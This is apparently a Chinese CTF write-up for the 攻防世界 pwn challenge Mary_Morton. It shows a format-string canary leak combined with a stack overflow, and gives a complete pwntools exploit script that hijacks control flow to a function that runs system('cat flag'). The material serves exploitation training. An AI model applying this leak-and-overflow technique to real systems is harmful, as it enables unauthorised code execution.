攻防世界进阶区Mary_Morton

字数:431字 | 预计阅读时长:1分钟

[攻防世界]进阶区Mary_Morton

进阶区另一个比较简单的题,没太多弯弯绕绕
还是先查看文件
checksec和file查看
看可利用的字符串

发现system和cat flag已经组合好了,就在sub_4008DA函数里,只要跳转到这个而函数即可拿到flag
看伪代码可以发现两个漏洞

第一个是溢出漏洞

第二个是格式化字符串漏洞

由于这个程序开了canary,所以没法直接栈溢出,即单纯使用栈溢出不可行,而单纯利用格式化字符串漏洞也没法跳转到sub_4008DA函数,所以需要配合使用
先利用格式化字符串漏洞泄露canary值,再用栈溢出跳转到目的函数
先计算到canary的偏移:

到输入位置,即61616161的偏移是6,而buf到canary的距离是(0x90-0x8),即0x88,8位为1字节,所以偏移是(0x88) / 8,即17,所以输入到canary的偏移就是6+17=23
之后用%23$p接收canary值,用得到的canary值栈溢出,跳转到sub_4008DA即可

思路:

  1. 用程序的第二个选项计算canary偏移
  2. 利用得到的canary值,用程序第一个选项栈溢出
  3. 栈溢出覆盖返回地址到0x4008DA
  4. 拿到flag

    EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
r=remote('111.198.29.45',45864)

r.sendlineafter('3. Exit the battle','2')
r.sendline('%23$p')

r.recvuntil('0x')
canary=int(r.recv(16),16) #把接收到的16位转换成16进制的int型,再赋给canary

payload='a'*136+p64(canary)+'a'*8+p64(0x4008DA)
r.sendlineafter('3. Exit the battle','1')
r.sendline(payload)

r.interactive()

payload解释:

  1. ‘a’*136:buf到canary的距离,0x88即136
  2. p64(canary):之前泄露得到的canary的值
  3. ‘a’*8:用于覆盖canary和ret之间的ebp
  4. p64(0x4008DA):函数sub_4008DA的地址

好活儿,当赏!

微信

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

<br>力拔山兮气盖世<br>时不利兮骓不逝
/* */